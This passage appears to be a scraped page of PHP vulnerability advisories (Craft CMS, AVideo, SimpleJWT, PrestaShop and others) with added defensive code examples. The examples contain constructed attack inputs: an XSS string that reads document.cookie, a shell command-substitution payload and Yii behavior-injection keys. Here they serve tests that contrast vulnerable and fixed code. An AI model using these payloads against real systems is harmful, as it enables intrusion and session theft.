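    return '<input type="text" name="righe" value="' . esc($righe) . '">';
}

/** Stored, element context (the tax-rate / product-type name shape). */
function renderNameCell(string $name): string
{
    return '<td>' . esc($name) . '</td>';
}

// Constructed attacker input: closes the attribute, then injects a tag with an event handler.
$payload = '"><img src=x onerror=alert(document.cookie)>';

$unsafe = renderRowsFieldUnsafe($payload);
$safe   = renderRowsFieldSafe($payload);
$cell   = renderNameCell('<script>alert(1)</script>');

assert(str_contains($unsafe, '<img src=x onerror='));     // a live element in the page
assert(!str_contains($safe, '<img'));                       // only &lt;img ... survives
assert(str_contains($safe, 'value="&quot;&gt;&lt;img'));
assert($cell === '<td>&lt;script&gt;alert(1)&lt;/script&gt;</td>');
```

Encoding at the sink rather than filtering at the source is what makes the stored cases safe too: a tax-rate name can legitimately contain `&` or `<`, and the admin panel is still harmless as long as every template that prints it encodes for its own context.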
Source : NVD
## 5.1
Score
Published March 3, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
PHP
Has Public Exploit Yes
Wiz
CVE-2026-34375 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.2
CVE-2026-34375 [HIGH] CVE-2026-34375 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34375 :
PHP vulnerability analysis and mitigation
Referenced in the advisory: `$_REQUEST['plugin']`, `plugin`, `security.php`, `User::getUserName()`, `User::getUserPass()`
Source : NVD
## 8.2
Score
Published March 27, 2026
Severity HIGH
CNA Score 8.2
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity HIGH No Fix Added at: Mar 31, 2026
Wiz
GHSA-4mgv-366x-qxvx Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-4mgv-366x-qxvx Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-4mgv-366x-qxvx :
PHP vulnerability analysis and mitigation
## Overview of all XSS Reports
Affected templates and helpers: `_includes/forms/checkbox.twig`, `_includes/forms/editableTable.twig`, `helpers/Cp.php`
## Summary
`checkbox.twig` renders the label with `{{ label|raw }}`; the `raw` filter switches off Twig's auto-escaping for that value.
## Affected Sources
1. /admin/settings/sections: Entries field -> Sources checklist
2. /admin/settings/assets/volumes/{vol_id}: Assets field -> Sources checklist
3. /admin/settings/users/groups: Users field -> Sources, User permissions page
4. /admin/settings/globals: User permissions page
5. Generated Fields Name (Volumes, Users, etc.): Card Attributes checkboxes
6. /admin/settings/fields: User profile pages
7. /admin/users: Users field -> Sources checklist
## Proof of Concept
## Required Permissions (Attacker)
Admin access, with `allowAdminChanges` enabled
Wiz
GHSA-6j87-m5qx-9fqp Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
[MEDIUM] GHSA-6j87-m5qx-9fqp Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-6j87-m5qx-9fqp :
PHP vulnerability analysis and mitigation
Affected template: `editableTable.twig` (Row Heading)
## Prerequisites
An administrator account, with `allowAdminChanges` enabled
## Steps to Reproduce
1. Navigate to Settings → Fields and create a new field with Type: Table
2. Fill in a Row Heading under Static Rows
3. Use the field in any object (e.g., user profile fields) → then visit any user's profile
4. Notice the XSS execution
## Resources
https://github.com/craftcms/cms/commit/7b372de262b8d9d2ce859f32780c3715719b6f5a
Source : NVD
## 2.3
Score
Published February 25, 2026
Severity LOW
CNA Score N/A
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Wiz
CVE-2026-24739 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.3
CVE-2026-24739 [MEDIUM] CVE-2026-24739 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24739 :
PHP vulnerability analysis and mitigation
Referenced in the advisory: `=`, `rmdir`, `del`, `MSYS2_ARG_CONV_EXCL`
Source : NVD
## 6.3
Score
Published January 28, 2026
Severity MEDIUM
CNA Score 6.3
Affected Technologies
PHP
Symfony
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
drupal-11.3
nextcloud-server-33
Sources
Chainguard Has Fix Added at: Feb 18, 2026
Composer Severity MEDIUM Has Fix Added at: Jan 29, 2026
Linux Severity MEDIUM Has Fix Added at: Jan 29, 2026
Wolfi Has Fix Added at: Mar 29, 2026
Linux Severity MEDIUM Has Fix Added at: Feb 04, 2026
Wiz
CVE-2026-31867 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.3
CVE-2026-31867 [MEDIUM] CVE-2026-31867 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31867 :
PHP vulnerability analysis and mitigation
Craft Commerce is an ecommerce platform for Craft CMS. Prior to 4.11.0 and 5.6.0, an Insecure Direct Object Reference (IDOR) vulnerability exists in Craft Commerce's cart functionality that allows users to hijack any shopping cart by knowing or guessing its 32-character number. The CartController accepts a user-supplied `number` parameter to load and modify shopping carts. No ownership validation is performed: the code only checks that the order exists and is incomplete, not whether the requester is authorized to access it. This vulnerability enables the takeover of shopping sessions and potential exposure of PII. This vulnerability is fixed in 4.11.0 and 5.6.0.
Source : NVD
## 6.3
Score
Published March 11, 2026
Wiz
CVE-2026-33204 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-33204 [HIGH] CVE-2026-33204 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33204 :
PHP vulnerability analysis and mitigation
SimpleJWT is a simple JSON web token library written in PHP. Prior to version 1.1.1, an unauthenticated attacker can perform a Denial of Service via JWE header tampering when PBES2 algorithms are used. Applications that call JWE::decrypt() on attacker-controlled JWEs using PBES2 algorithms are affected. This issue has been patched in version 1.1.1.
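Why an unauthenticated JWE can cost the recipient arbitrary CPU, and the check that stops it, as an added example. This is not SimpleJWT code; it assumes PHP 8, and the iteration ceiling (`PBES2_MAX_ITERATIONS`) is a deployment choice, not a value from the advisory or from RFC 7518.

```php
<?php
declare(strict_types=1);

// Added example, not SimpleJWT code (PHP 8). The JWE protected header is
// attacker controlled, and for the PBES2 algorithms it carries the PBKDF2
// iteration count (p2c) and salt (p2s) the *recipient* must use to unwrap
// the content key. Nothing authenticates the header before key derivation,
// so p2c=2^31 costs the server billions of HMAC calls per request. The fix
// is a hard ceiling on p2c (and a sane p2s length) checked before hashing.
// The ceiling below is an assumption for this example.

const PBES2_MIN_ITERATIONS = 1000;      // RFC 7518 §4.8.1.2 minimum
const PBES2_MAX_ITERATIONS = 1_000_000; // deployment ceiling (assumption)
const PBES2_ALGS = [                    // alg => [PRF, wrapping-key bytes]
    'PBES2-HS256+A128KW' => ['sha256', 16],
    'PBES2-HS384+A192KW' => ['sha384', 24],
    'PBES2-HS512+A256KW' => ['sha512', 32],
];

function b64url_encode(string $s): string
{
    return rtrim(strtr(base64_encode($s), '+/', '-_'), '=');
}

function b64url_decode(string $s): string|false
{
    return base64_decode(strtr($s, '-_', '+/') . str_repeat('=', (4 - strlen($s) % 4) % 4), true);
}

/** Parse the protected header of a compact JWE (first dot-separated segment). */
function jweProtectedHeader(string $compact): array
{
    $raw = b64url_decode(explode('.', $compact, 2)[0]);
    if ($raw === false) {
        throw new UnexpectedValueException('protected header is not base64url');
    }
    $h = json_decode($raw, true, 8, JSON_THROW_ON_ERROR);
    return is_array($h) ? $h : throw new UnexpectedValueException('protected header is not a JSON object');
}

/**
 * Derive the PBES2 wrapping key, refusing headers that would make the
 * derivation unreasonably expensive. Salt per RFC 7518: UTF8(alg) || 0x00 || p2s.
 */
function pbes2DeriveKey(array $header, string $password): string
{
    $alg = $header['alg'] ?? '';
    if (!isset(PBES2_ALGS[$alg])) {
        throw new UnexpectedValueException("not a PBES2 alg: $alg");
    }
    $p2c = $header['p2c'] ?? null;
    if (!is_int($p2c) || $p2c < PBES2_MIN_ITERATIONS || $p2c > PBES2_MAX_ITERATIONS) {
        throw new UnexpectedValueException('p2c out of accepted range');
    }
    $p2s = is_string($header['p2s'] ?? null) ? b64url_decode($header['p2s']) : false;
    if ($p2s === false || strlen($p2s) < 8 || strlen($p2s) > 64) {
        throw new UnexpectedValueException('p2s missing or of unreasonable length');
    }
    [$prf, $len] = PBES2_ALGS[$alg];
    return hash_pbkdf2($prf, $password, $alg . "\0" . $p2s, $p2c, $len, true);
}

// Constructed JWEs: same header except for p2c; the remaining segments are dummies
// because the derivation is refused (or succeeds) before they are ever touched.
$salt = random_bytes(16);
$mk = fn (int $p2c) => b64url_encode(json_encode([
    'alg' => 'PBES2-HS256+A128KW', 'enc' => 'A128CBC-HS256',
    'p2s' => b64url_encode($salt), 'p2c' => $p2c,
])) . '.' . b64url_encode('ek') . '.' . b64url_encode('iv') . '.' . b64url_encode('ct') . '.' . b64url_encode('tag');

$key = pbes2DeriveKey(jweProtectedHeader($mk(4096)), 'correct horse battery staple');
assert(strlen($key) === 16);

try {
    pbes2DeriveKey(jweProtectedHeader($mk(2147483647)), 'correct horse battery staple');
    assert(false, 'oversized p2c must be rejected before PBKDF2 runs');
} catch (UnexpectedValueException $e) {
    assert($e->getMessage() === 'p2c out of accepted range');
}
```

The order matters: the range checks run on the parsed header before `hash_pbkdf2()` is called, so a hostile token is rejected in microseconds instead of after the full iteration count. The same reasoning applies to any parameter in an unauthenticated header that sizes work on the recipient (`p2c` here, but also oversized `p2s`, or a `zip` that triggers decompression).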
Source : NVD
## 7.5
Score
Published March 20, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 17.9
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
kelvinmo/simplejwt
Sources
NVD
Wiz
CVE-2026-33051 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-33051 [MEDIUM] CVE-2026-33051 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33051 :
PHP vulnerability analysis and mitigation
Craft CMS is a content management system (CMS). In versions 5.9.0-beta.1 through 5.9.10, the revision/draft context menu in the element editor renders the creator’s fullName as raw HTML due to the use of Template::raw() combined with Craft::t() string interpolation. A low-privileged control panel user (e.g., Author) can set their fullName to an XSS payload via the profile editor, then create an entry with two saves. If an administrator is logged in and executes a specifically crafted payload while an elevated session is active, the attacker’s account can be elevated to administrator. This issue has been fixed in version 5.9.11.
Source : NVD
## 5.3
Score
Published March 20, 2026
Severity MEDIUM
CNA Score 5.3
Wiz
CVE-2026-32263 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2026-32263 [HIGH] CVE-2026-32263 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32263 :
PHP vulnerability analysis and mitigation
Craft CMS is a content management system (CMS). From version 5.6.0 to before version 5.9.11, in src/controllers/EntryTypesController.php, the $settings array from parse_str is passed directly to Craft::configure() without Component::cleanseConfig(). This allows injecting Yii2 behavior/event handlers via "as" or "on" prefixed keys, the same attack vector as the original advisory. Craft control panel administrator permissions and allowAdminChanges must be enabled for this to work. This issue has been patched in version 5.9.11.
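The "as"/"on" key injection that this entry and CVE-2026-25498 above share, with the cleansing step both fixes rely on, as an added example. This is not Craft CMS or Yii code; it assumes PHP 8, and `FakeComponent` imitates only the `on `/`as ` handling of Yii's `Component::__set()` so the effect can be observed without Yii installed.

```php
<?php
declare(strict_types=1);

// Added example, not Craft CMS or Yii code (PHP 8). In Yii2, assigning a
// property named "on <event>" on a Component attaches an event handler and
// "as <name>" attaches a behavior, so a request-derived array that reaches
// Craft::configure() / Craft::createObject() with such keys lets the sender
// attach code of their choosing. Both advisories are fixed by stripping those
// keys first; cleanseConfig() below is a stand-alone version of that step.

/** Drop every "as ..." / "on ..." key at any depth of a config array. */
function cleanseConfig(array $config): array
{
    $clean = [];
    foreach ($config as $key => $value) {
        if (is_string($key) && (str_starts_with($key, 'as ') || str_starts_with($key, 'on '))) {
            continue;
        }
        $clean[$key] = is_array($value) ? cleanseConfig($value) : $value;
    }
    return $clean;
}

final class FakeComponent
{
    public array $attached = [];   // what a real Component would have wired up
    public array $props = [];

    public function __set(string $name, mixed $value): void
    {
        if (str_starts_with($name, 'on ')) {
            $this->attached[] = 'event:' . substr($name, 3);
        } elseif (str_starts_with($name, 'as ')) {
            $this->attached[] = 'behavior:' . substr($name, 3);
        } else {
            $this->props[$name] = $value;
        }
    }
}

/** What Craft::configure() boils down to: assign each config key as a property. */
function configure(FakeComponent $c, array $config): FakeComponent
{
    foreach ($config as $name => $value) {
        $c->$name = $value;
    }
    return $c;
}

// Constructed request body; parse_str() keeps spaces inside bracketed keys,
// so "as evil" and "on afterSave" survive as array keys.
parse_str('settings[name]=Article&settings[handle]=article'
    . '&settings[as%20evil][class]=yii%5Cbase%5CBehavior'
    . '&settings[on%20afterSave]=system', $body);
$settings = $body['settings'];

$unsafe = configure(new FakeComponent(), $settings);
assert($unsafe->attached === ['behavior:evil', 'event:afterSave']);

$safe = configure(new FakeComponent(), cleanseConfig($settings));
assert($safe->attached === []);
assert($safe->props === ['name' => 'Article', 'handle' => 'article']);
```

The practical check when reviewing a Craft or Yii code base is to grep for `Craft::configure(`, `Craft::createObject(` and `Yii::configure(` and confirm that anything derived from `$_POST`, `$_GET` or `parse_str()` passes through a cleansing step like this before reaching them; the advisory's point is that the EntryTypesController path did not.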
Source : NVD
## 8.6
Score
Published March 16, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
PHP
Craft CMS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
Wiz
CVE-2026-3241 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2026-3241 [MEDIUM] CVE-2026-3241 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3241 :
PHP vulnerability analysis and mitigation
In Concrete CMS below version 9.4.8, a stored cross-site scripting (XSS) vulnerability exists in the "Legacy Form" block. An authenticated user with permissions to create or edit forms (e.g., a rogue administrator) can inject a persistent JavaScript payload into the options of a multiple-choice question (Checkbox List, Radio Buttons, or Select Box). This payload is then executed in the browser of any user who views the page containing the form. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 4.8 with vector CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks M3dium for reporting.
Source : NVD
## 4.8
Score
Published March 4, 2026
Severity MEDIUM
CNA Score 4.8
Wiz
CVE-2026-27126 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.9
CVE-2026-27126 [MEDIUM] CVE-2026-27126 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27126 :
PHP vulnerability analysis and mitigation
Referenced in the advisory: `editableTable.twig`, `html`, `allowAdminChanges`
Source : NVD
## 5.9
Score
Published February 24, 2026
Severity MEDIUM
CNA Score 5.9
Affected Technologies
PHP
Craft CMS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
cpe:2.3:a:craftcms:craft_cms
craftcms/cms
Sources
Composer Severity MEDIUM Has Fix Added at: Feb 24, 2026
Linux Severity MEDIUM Has Fix Added at: Feb 24, 2026
Windows Severity MEDIUM Has Fix Added at: Feb 24, 2026
Linux Severity MEDIUM Has Fix Added at: Mar 03, 2026
Windows Severity MEDIUM Has Fix Added at: Mar 03, 2026
Wiz
CVE-2026-32266 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.4
CVE-2026-32266 [LOW] CVE-2026-32266 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32266 :
PHP vulnerability analysis and mitigation
Referenced in the advisory: `DefaultController->actionLoadBucketData()`
Source : NVD
## 2.4
Score
Published March 18, 2026
Severity LOW
CNA Score 2.4
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
craftcms/google-cloud
Sources
NVD
Composer Severity LOW Has Fix Added at: Mar 17, 2026
Wiz
CVE-2026-34558 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.1
CVE-2026-34558 [CRITICAL] CVE-2026-34558 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34558 :
PHP vulnerability analysis and mitigation
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input within the Methods Management functionality when creating or managing application methods/pages. Multiple input fields accept attacker-controlled JavaScript payloads that are stored server-side without sanitization or output encoding. These stored values are later rendered directly into administrative interfaces and global navigation components without proper encoding, resulting in Stored DOM-Based Cross-Site Scripting (XSS). This issue has been patched in version 0.31.0.0.
Source : NVD
Wiz
CVE-2026-25484 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2026-25484 [MEDIUM] CVE-2026-25484 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25484 :
PHP vulnerability analysis and mitigation
Craft Commerce is an ecommerce platform for Craft CMS. In versions from 4.0.0-RC1 to 4.10.0 and from 5.0.0 to 5.5.1, there is a Stored XSS via Product Type names. The name is not sanitized when displayed in user permissions settings. The vulnerable input (source) is in Commerce (Product Type settings), but the sink is in CMS user permissions settings. This issue has been patched in versions 4.10.1 and 5.5.2.
Source : NVD
## 4.8
Score
Published February 3, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.5
Exploitation Probability (EPSS) N/A
Wiz
CVE-2026-30927 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-30927 [MEDIUM] CVE-2026-30927 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-30927 :
PHP vulnerability analysis and mitigation
Admidio is an open-source user management solution. Prior to 5.0.6, in modules/events/events_function.php, the event participation logic allows any user who can participate in an event to register OTHER users by manipulating the user_uuid GET parameter. The condition uses || (OR), meaning if possibleToParticipate() returns true (event is open for participation), ANY user - not just leaders - can specify a different user_uuid and register/cancel participation for that user. The code then operates on $user->getValue('usr_id') (the target user from user_uuid) rather than the current user. This vulnerability is fixed in 5.0.6.
Source : NVD
## 5.3
Score
Published March 10, 2026
Severity MEDIUM
CNA Score 5.3
Wiz
CVE-2026-26188 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.1
CVE-2026-26188 [MEDIUM] CVE-2026-26188 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26188 :
PHP vulnerability analysis and mitigation
Solspace Freeform plugin for Craft CMS 5.x is a super flexible form-building tool. An authenticated, low-privilege user (able to create/edit forms) can inject arbitrary HTML/JS into the Craft Control Panel (CP) builder and integrations views. User-controlled form labels and integration metadata are rendered with dangerouslySetInnerHTML without sanitization, leading to stored XSS that executes when any admin views the builder/integration screens. This vulnerability is fixed in 5.14.7.
Source : NVD
## 5.1
Score
Published February 12, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Wiz
CVE-2026-25597 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-25597 [MEDIUM] CVE-2026-25597 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25597 :
PHP vulnerability analysis and mitigation
PrestaShop is an open source e-commerce web application. Prior to 8.2.4 and 9.0.3, there is a time-based user enumeration vulnerability in the user authentication functionality of PrestaShop. This vulnerability allows an attacker to determine whether a customer account exists in the system by measuring response times. This vulnerability is fixed in 8.2.4 and 9.0.3.
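Both enumeration channels on this page, the response body (the CI4MS password-reset advisory GHSA-654x-9q7r-g966 above) and the response time (this entry), closed in one login and reset handler, as an added example. This is not PrestaShop or CI4MS code; it assumes PHP 8 and keeps its users in a constructed in-memory array.

```php
<?php
declare(strict_types=1);

// Added example, not CI4MS or PrestaShop code (PHP 8). Two enumeration
// channels are closed: the response body (always the same message) and the
// response time (the same bcrypt work is done whether or not the account
// exists). Users live in a constructed in-memory array.

final class Accounts
{
    private array $users;
    private string $dummyHash;

    public function __construct(array $users)
    {
        $this->users = $users;
        // Same algorithm and cost as the real hashes, so verify() costs the same on every path.
        $this->dummyHash = password_hash(bin2hex(random_bytes(16)), PASSWORD_BCRYPT, ['cost' => 10]);
    }

    /** Vulnerable: distinct message, and no hash work at all when the user is unknown. */
    public function loginUnsafe(string $email, string $password): string
    {
        if (!isset($this->users[$email])) {
            return 'User not found';
        }
        return password_verify($password, $this->users[$email]) ? 'ok' : 'Wrong password';
    }

    /** Fixed: one message, one bcrypt verification on every path. */
    public function loginSafe(string $email, string $password): string
    {
        $hash = $this->users[$email] ?? $this->dummyHash;
        $valid = password_verify($password, $hash) && isset($this->users[$email]);
        return $valid ? 'ok' : 'Invalid email or password';
    }

    /** Password reset: identical answer either way; any mail is sent out of band. */
    public function requestResetSafe(string $email): string
    {
        if (isset($this->users[$email])) {
            // queue the reset mail here (a worker, not the request thread)
        }
        return 'If that address is registered, a reset link has been sent.';
    }
}

$accounts = new Accounts([
    'alice@example.com' => password_hash('correct horse', PASSWORD_BCRYPT, ['cost' => 10]),
]);

assert($accounts->loginUnsafe('nobody@example.com', 'x') === 'User not found');
assert($accounts->loginSafe('nobody@example.com', 'x') === 'Invalid email or password');
assert($accounts->loginSafe('alice@example.com', 'wrong') === 'Invalid email or password');
assert($accounts->loginSafe('alice@example.com', 'correct horse') === 'ok');
assert($accounts->requestResetSafe('nobody@example.com') === $accounts->requestResetSafe('alice@example.com'));

// Timing: the safe path spends roughly the same time for unknown and known users.
$t = hrtime(true); $accounts->loginSafe('nobody@example.com', 'x'); $unknown = hrtime(true) - $t;
$t = hrtime(true); $accounts->loginSafe('alice@example.com', 'x');  $known   = hrtime(true) - $t;
printf("unknown=%.1fms known=%.1fms\n", $unknown / 1e6, $known / 1e6);
```

Note the order in `loginSafe()`: `password_verify()` runs before the `isset()` so the hash work is never short-circuited away. Residual timing differences (database lookup hit vs. miss, mail queueing) are much smaller than a bcrypt verification but are still worth measuring with a few hundred samples rather than assumed away.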
Source : NVD
## 5.3
Score
Published February 6, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Prestashop
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 23
Exploitation Probability (EPSS) 0.1
Wiz
CVE-2025-67648 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2025-67648 [HIGH] CVE-2025-67648 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67648 :
PHP vulnerability analysis and mitigation
Shopware is an open commerce platform. Versions 6.4.6.0 through 6.6.10.9 and 6.7.0.0 through 6.7.5.0 have a Reflected XSS vulnerability in AuthController.php. A request parameter from the login page URL is directly rendered within the Twig template of the Storefront login page without further processing or input validation. This allows direct code injection into the template via the URL parameter, waitTime, which lacks proper input validation. This issue is fixed in versions 6.6.10.10 and 6.7.5.1.
Source : NVD
## 6.1
Score
Published December 11, 2025
Severity MEDIUM
CNA Score 7.1
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Wiz
CVE-2023-7332 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2023-7332 [HIGH] CVE-2023-7332 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2023-7332 :
PHP vulnerability analysis and mitigation
PocketMine-MP versions prior to 4.18.1 contain an improper input validation vulnerability in inventory transaction handling. A remote attacker with a valid player session can request that the server drop more items than are available in the player's hotbar, triggering a server crash and resulting in denial of service.
Source : NVD
## 7.1
Score
Published December 31, 2025
Severity HIGH
CNA Score 7.1
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 52.6
Exploitation Probability (EPSS) 0.3
Affected packages and libraries
pocketmine/pocketmine-mp
Sources
NVD
Composer Severity HIGH Has Fix Added at:
Wiz
CVE-2026-32300 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.1
CVE-2026-32300 [HIGH] CVE-2026-32300 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32300 :
PHP vulnerability analysis and mitigation
Connect-CMS is a content management system. In versions on the 1.x series up to and including 1.41.0 and versions on the 2.x series up to and including 2.41.0, an improper authorization issue in the My Page profile update feature may allow modification of arbitrary user information. Versions 1.41.1 and 2.41.1 contain a patch.
Source : NVD
## 8.1
Score
Published March 23, 2026
Severity HIGH
CNA Score 8.1
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
opensource-workshop/connect-cms
Sources
NVD
Composer Severity HIGH
Wiz
CVE-2026-29058 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-29058 [CRITICAL] CVE-2026-29058 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-29058 :
PHP vulnerability analysis and mitigation
AVideo is a video-sharing platform. Prior to version 7.0, an unauthenticated attacker can execute arbitrary OS commands on the server by injecting shell command substitution into the base64Url GET parameter. This can lead to full server compromise, data exfiltration (e.g., configuration secrets, internal keys, credentials), and service disruption. This issue has been patched in version 7.0.
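Why a parameter spliced into shell text is executable, and the two ways to stop it, as an added example that also covers the RaspAP entry (CVE-2026-24788) above. This is not AVideo or RaspAP code; it assumes PHP 7.4 or later on a Unix host with `/bin/sh` and the POSIX `printf` binary, and the payload is constructed.

```php
<?php
declare(strict_types=1);

// Added example, not AVideo or RaspAP code. Two ways to stop a request
// parameter from becoming shell syntax: (a) escapeshellarg() when a shell is
// unavoidable, (b) no shell at all, by handing proc_open() an argv array
// (PHP >= 7.4). The command run here is the POSIX `printf` binary so the
// script is harmless on any Unix host.

/** Vulnerable: the value is spliced into shell text; $(...) and backticks are expanded. */
function runShellUnsafe(string $value): string
{
    return (string) shell_exec("printf '%s' " . $value);
}

/** Still a shell, but the value is quoted as a single literal argument. */
function runShellEscaped(string $value): string
{
    return (string) shell_exec("printf '%s' " . escapeshellarg($value));
}

/** No shell: argv goes straight to execve(), so there is nothing to inject into. */
function runArgv(string $value): string
{
    $proc = proc_open(['printf', '%s', $value], [1 => ['pipe', 'w']], $pipes);
    if (!is_resource($proc)) {
        throw new RuntimeException('proc_open failed');
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    proc_close($proc);
    return $out;
}

// Constructed payload in the shape of a base64url-looking parameter carrying a
// command substitution. "id -u" is read-only here; an attacker would not be.
$payload = 'dmlkZW8$(id -u)';

assert(runShellUnsafe($payload) !== $payload);    // the substitution ran
assert(runShellEscaped($payload) === $payload);   // literal bytes only
assert(runArgv($payload) === $payload);
```

Prefer the argv form wherever the code base allows it: `escapeshellarg()` protects the argument boundary but not the called program's own option parsing (a value beginning with `-` is still an option to most tools), so the argument list should also be validated against what the program expects.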
Source : NVD
## 9.8
Score
Published March 6, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 97.9
Exploitation Probability (EPSS) 50.9
Wiz
CVE-2026-29172 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-29172 [HIGH] CVE-2026-29172 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-29172 :
PHP vulnerability analysis and mitigation
Craft Commerce is an ecommerce platform for Craft CMS. Prior to 4.10.2 and 5.5.3, Craft Commerce is vulnerable to SQL Injection in the purchasables table endpoint. The sort parameter is split by | and the first part (column name) is passed directly as an array key to orderBy() without whitelist validation. Yii2's query builder does NOT escape array keys, allowing an authenticated attacker to inject arbitrary SQL into the ORDER BY clause. This vulnerability is fixed in 4.10.2 and 5.5.3.
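The two SQL sinks on this page that cannot be fixed the same way, a `LIKE` term (the OpenSTAManager entry CVE-2026-24417 above, where the blind variant differs only in payload) and an `ORDER BY` column (this entry), as an added example. This is not Craft Commerce or OpenSTAManager code; it assumes PHP 8 with `pdo_sqlite` and runs against constructed rows in an in-memory database.

```php
<?php
declare(strict_types=1);

// Added example, not OpenSTAManager or Craft Commerce code (PHP 8, pdo_sqlite).
// The search term is bound and its LIKE wildcards escaped; the ORDER BY
// column, which cannot be a bound parameter, is mapped through an allow-list.

$pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
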